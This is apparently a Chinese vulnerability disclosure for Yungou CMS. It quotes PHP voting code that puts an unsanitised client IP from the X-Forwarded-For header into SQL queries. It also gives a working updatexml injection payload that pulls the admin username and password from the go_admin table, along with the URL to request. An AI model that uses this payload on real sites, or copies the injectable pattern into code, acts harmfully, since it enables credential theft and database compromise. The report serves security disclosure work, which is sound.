云购Cms修复不当仍存在Sql注入

漏洞作者:

浅蓝

详细说明:

根据雨牛的 WooYun: Yungoucms Sql Injection 第一枚

我看了下相同位置的代码

public function checked_option(){

			  

		 $mysql_model=System::load_sys_class('model');

		 $title="投票";	 

	     $curtime=time();

		 $option_id=abs(intval($_POST['radio'])); 

		 $vote_id= abs(intval($_POST['vote_id']));

		 $clientip=_get_ip();

		 $sqlallowguest='';

		 $sqlinterval=0;		  

		 

		//查询投票项的规则和规定时间

		 $vote_subjects=$mysql_model->GetOne("select * from `@#_vote_subject` where `vote_id`='$vote_id'");         

		 $sqlallowguest=$vote_subjects['vote_allowguest'];//1允许游客投票 0不允许游客投票

		 $sqlinterval=$vote_subjects['vote_interval'];  //N天后可再次投票,0 表示此IP地址只能投一次

		 if(1==$sqlallowguest){//判断是否允许游客投票		 		      		 

			  $vote_activer=$mysql_model->GetOne("select * from `@#_vote_activer` where `vote_id`='$vote_id' and `ip`='$clientip' order by subtime desc"); 

			 if(!empty($vote_activer)){//判断该ip用户已经投过票			    

				 //上次投票间隔天数

			       $datenum=($curtime-$vote_activer['subtime'])/(60*60*24);				

			    if($sqlinterval==0 || $datenum<=$sqlinterval){ //0 表示此IP地址只能投一次

				   _message("您已参加此次投票活动",null,3);

				}else{			

					 //查出新增加的票数		 

					$vote_option=$mysql_model->GetList("select * from `@#_vote_option` where  `option_id`='$option_id' ");					  

					$option_number=$vote_option[0]['option_number']+1;					  



					 $mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' ");

					 

		 

			        $mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') ");

			     _message("投票成功,感谢您的参与",null,3); 

				}		       

			}else{			 

				 //查出新增加的票数		 

				$vote_option=$mysql_model->GetList("select * from `@#_vote_option` where  `option_id`='$option_id' ");	

				  

				  $option_number=$vote_option[0]['option_number']+1;					  



				 $mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' ");

					 

					 

			    $mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') ");

			     _message("投票成功,感谢您的参与",null,3); 

			 }

			 

		 

		 }else{	    

			 if($this->userid==''){

			    _message("您没有投票权限,请登录后投票!",null,3); 

				exit();

			 }

			 $vote_activer=$mysql_model->GetOne("select * from `@#_vote_activer` where `vote_id`='$vote_id' and `userid`='$this->userid'");

			 if(!empty($vote_activer)){//判断该用户已经投过票

			    

				 //上次投票间隔天数

			       $datenum=($curtime-$vote_activer['subtime'])/(60*60*24);

				  

				

			    if($sqlinterval==0 || $datenum<=$sqlinterval){ //0 表示此IP地址只能投一次

				   _message("您已参加此次投票活动",null,3);

				}else{

				//查出新增加的票数		 

				$vote_option=$mysql_model->GetList("select * from `@#_vote_option` where  `option_id`='$option_id' ");	

				  

				  $option_number=$vote_option[0]['option_number']+1;					  



				 $mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' ");

				 

			     $mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') ");

			     _message("投票成功,感谢您的参与",null,3); 

				}

			       

			 }else{

			 	 //查出新增加的票数		 

				$vote_option=$mysql_model->GetList("select * from `@#_vote_option` where  `option_id`='$option_id' ");	

				  

				  $option_number=$vote_option[0]['option_number']+1;					  



				 $mysql_model->Query("UPDATE `@#_vote_option` SET option_number='$option_number' where `vote_id`='$vote_id' and `option_id`='$option_id' ");

				 

			    $mysql_model->Query("INSERT INTO `@#_vote_activer`(option_id,vote_id,userid,ip,subtime) VALUES('$option_id','$vote_id','$this->userid','$clientip','$curtime') ");

			     _message("投票成功,感谢您的参与",null,3); 

			 }

		 }
 

$clientip=_get_ip()
 

再看看 _get_ip()函数



/*获取客户端ip*/

function _get_ip(){

		if (isset($_SERVER['HTTP_CLIENT_IP']) && strcasecmp($_SERVER['HTTP_CLIENT_IP'], "unknown")) 

			$ip = $_SERVER['HTTP_CLIENT_IP']; 

		else if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && strcasecmp($_SERVER['HTTP_X_FORWARDED_FOR'], "unknown")) 

			$ip = $_SERVER['HTTP_X_FORWARDED_FOR']; 

		else if (isset($_SERVER['REMOTE_ADDR']) && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 

			$ip = $_SERVER['REMOTE_ADDR']; 

		else if (isset($_SERVER['REMOTE_ADDR']) && isset($_SERVER['REMOTE_ADDR']) && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 

			$ip = $_SERVER['REMOTE_ADDR']; 

		else $ip = ""; 

		return ($ip);

}
 

把xff改为 1.1.1.1'or updatexml(1,concat(0x5e24,(select concat(username,0x23,userpass) from go_admin limit 0,1),0x5e24),1) or'

登录后打开 http://localhost/yungou/?/vote/vote/checked_option

01193455dde74f10d1c22130de738550843b5bc3[1]

发表评论